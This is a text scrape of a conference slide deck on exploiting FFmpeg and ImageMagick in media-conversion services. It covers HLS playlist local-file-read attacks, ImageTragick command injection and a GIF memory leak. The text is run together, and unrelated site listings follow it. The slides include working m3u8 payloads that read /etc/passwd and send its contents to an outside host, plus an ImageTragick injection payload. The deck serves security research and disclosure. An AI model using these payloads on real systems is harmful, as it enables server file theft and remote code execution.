ffmpeg& imagemagick - 2017. · pdf file#extm3u #ext-x-media-sequence:0 #extinf:10.0,...

FFmpeg &ImageMagickexploitation

NikolayErmishkinMail.Ru

•Libraryandutilityforvideoencoding

FFmpeg

Convertvideo

Generatepreview

•Youcansetanyextension(mp4toavi etc)

Contentsniffing*

FFmpeg versionfingerprinting

#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,http://example.org/video.mp4#EXT-X-ENDLIST

concat:file:///video1.mp4|file:///video2.mp4

concat

concat:http://yngwie.ru/header.m3u8|file:///etc/passwd

concat

concat:http://yngwie.ru/header.m3u8|file:///etc/passwd#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:,http://yngwie.ru?root:x:0:0:root:/root:/bin/bash…

concat

#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,concat:http://yngwie.ru/header.m3u8|file:///etc/passwd#EXT-X-ENDLIST

concat

#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,concat:http://yngwie.ru/header.m3u8|file:///etc/passwd#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:,http://yngwie.ru?root:x:0:0:root:/root:/bin/bash…#EXT-X-ENDLIST

concat

CVE-2016-10191– https://trac.ffmpeg.org/ticket/5994

https://github.com/ffmpeg-test/ffmpeg-test

Automate

AllowstoinsertanysupportedfileinsideAVI,forexamplehlshttps://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p

#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,

file:///some/txt/file.txt#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,file:///etc/passwd#EXT-X-ENDLIST

ImageMagick isasoftwaresuitetocreate,edit,compose,orconvertbitmapimages

ImageMagick (GraphicsMagick)

Convert

Identify

•Youcansetanyextension(jpgtopng etc)

Contentsniffing*

pushgraphic-contextviewbox 00100100fill'url(http://example.org/image.jpg)'popgraphic-context

<delegatedecode="svg"command=""rsvg"-o"%o""%i""/>

delegates.xml

pushgraphic-contextviewbox 00100100fill'url(https://example.org/oops.jpg"&&CMD_INJECTION)’popgraphic-context

<delegatedecode="https"command=""curl"-s-k-L-o"%o""https:%M""/>

ImageTragick

FacebookwasvulnerabletoImageTragick 5monthsafterpublicdisclosehttp://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html

ImageTragick

• 121CVEwithCVSS>5sinceImageTragick (6-7permonth)• Hardtoexploit

BinaryBugs

Yahoobleed – https://scarybeastsecurity.blogspot.ru/2017/05/bleed-continues-18-byte-file-14k-bounty.htmlOldrarelyusedformat- RLE.

MemoryLeak

CVE-2017-15277 – memoryleakinGIFparser

MemoryLeak

•256colors•Pallette (256*3=768byte)

•Whatifleftempty?

MemoryLeak

Simplescripttoexploit– https://github.com/neex/gifoeb1. Generateimage2. Uploadittoservice3. Downloadconvertedimage4. Decodeconvertedimage

MemoryLeak

ffmpeg& imagemagick - 2017. · pdf file#extm3u #ext-x-media-sequence:0 #extinf:10.0,...

Documents

ext industry

catalog #8 · e-mail: burkejm@watts.com lana burk, sales...

want to make a huge difference - utah's hogle zoo ·...

cccamskyitalia.weebly.com · web viewabp news aajtak.uk...

tonya mcdaniel ext. 2342 jeanne lucas ext. 2344 katie shaw...

bruce springsteen - 01 - all i need - schwindlers reich ·...

new folder concat 5 - uniplac · 2017. 10. 5. · title:...

ext ext name div room name - ipcinfo.org

catalogue by... · 2015. 8. 31. · 4 60 30 8 100 73 8 4 4...

final product catlogue · cream + capsules ingredients...

concat india (construction machinery & equipments)

plancton · plancton se648/1pb-ext se649/1gb-ext optional...

population per region -...

1 ilt induction ashley garner vle manager ext 2802 it...

1. 3. connect - download.p4c.philips.com · conectores del...

alan jackson - a little bluer than that -...

alt set / alt member ext amount ext amount and units unit...

ext designer for ext js 4 users guide

ext coating

agilent e6607c ext multiport wireless communications test...